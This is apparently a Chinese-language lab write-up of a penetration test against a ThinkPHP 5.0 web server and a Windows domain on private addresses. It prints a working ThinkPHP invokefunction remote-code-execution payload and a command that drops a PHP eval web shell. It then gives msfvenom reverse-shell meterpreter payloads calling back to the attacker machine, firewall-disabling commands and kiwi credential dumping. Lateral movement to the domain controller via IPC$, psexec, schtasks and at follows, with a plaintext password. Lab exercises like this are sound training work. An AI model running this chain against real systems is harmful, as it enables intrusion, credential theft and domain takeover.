环境描述
kali 192.168.135.128/24
win7 192.168.135.129/24 192.168.138.136
win8 192.168.138.138
外网
thinkphp5.0
找了几个tp的漏洞工具扫一下,就可以得到了
phpinfo checked success! poc1: /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
一个rce漏洞
稍微改一下payload,s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
就可以得知这个入口admin可以利用了。
s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_POST[%27matoujin%27]);%20?^%3E%20%3E%20shell.php
跑了一下,发现GET方法的木马是不可以的,蚁剑会无返回数据,具体原因可能因为在源码分析中invokeargs函数以数组方式传递,而POST参数以数组方式传递,才能继续命令执行?
内网
msf马
先通过蚁剑把防火墙关了
netsh firewall set opmode disable
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.135.128 LPORT=4444 -b"\\x00" -e x86/shikata_ga_nai -f exe > msf.exe
msf上payloadwindows/meterpreter/reverse_tcp
然后直接getsystem,手动进程迁移
kiwi
creds_kerberos
管理员密码就出来了。
那么这台主机也就相当于拿下了。
横向
ipconfig
IPv4 Address : 192.168.138.136 IPv4 Netmask : 255.255.255.0
找一下域控
systeminfo
域: sun.com 登录服务器: \\DC
nslookup -type=SRV _ldap._tcp
dc.sun.com internet address = 192.168.138.138
配置路由转发
msf>route add 192.168.138.0 255.255.255.0 6
nmap扫一下域控ip T4
Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008
445端口
进meteroreter改一下编码chcp 65001
利用之前的明文密码进行ipc空连接
net use \\\\192.168.138.138\\ipc$ “dc1234.com” /user:administrator
结果是disconnected,那就算了,还是找一下win2008 server的洞
(这里后来我打开win2008dc机,发现ipc是关闭的,后来我把它打开再net use就是正常的了)
根据提示利用psexec进行远程控制
use exploit/windows/smb/psexec
set rhosts 192.168.138.138
报错,无法建立
sc \\\\192.168.138.138 create unablefirewal binpath= "netsh advfirewall set allprofiles state off"
sc \\\\192.168.138.138 start unablefirewalll
报错,服务没有及时响应启动或控制请求
进攻DC:test payload1
- ip为攻击机
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.135.128 LPORT=5555 -b"\\x00" -e x86/shikata_ga_nai -f exe > 1.exe
- 内网机上传并执行木马
建立连接
net use \\\\192.168.138.138\\ipc$ “dc1234.com” /user:administrator
上传木马
copy C:\\Users\\Administrator\\Desktop\\1.exe \\\\192.168.138.138\\c$
打开win2008检查一下
确实是上传了
Psexec64执行报错
Psexec64.exe \\\\192.168.138.138 -u administrator -p dc1234.com C:\\1.exe
报错:登录失败,未授予用户在此计算机上的请求登录类型。
解决方案:
Psexec64.exe \\\\192.168.138.138 -accepteula -u administrator -p dc1234.com -i C:\\1.exe
但是会卡在执行处。
用计划任务试一下
net time \\\\192.168.138.138 查询时间
Psexec64.exe \\\\192.168.138.138 -h -u administrator -p dc1234.com -i schtasks /create /TN cs1 /TR C:\\1.exe /SC once /ST 21:18
计划查询失败,到时间进程未执行,schtasks报错退出。检查发现,计划任务cs并未创建。
PsExec64.exe \\\\192.168.138.138 -u administrator -p dc1234.com cmd /c "ipconfig" 执行成功
at \\\\192.168.138.138 21:45:00 C:\\1.exe 执行成功
test1证明
-
at进行远程计划任务可行 -
copy上传文件可行
实际操作只要跑一下msf就好
Psexec64.exe \\\\192.168.138.138 -accepteula -u administrator -p dc1234.com -i cmd.exe 也行
Comments | NOTHING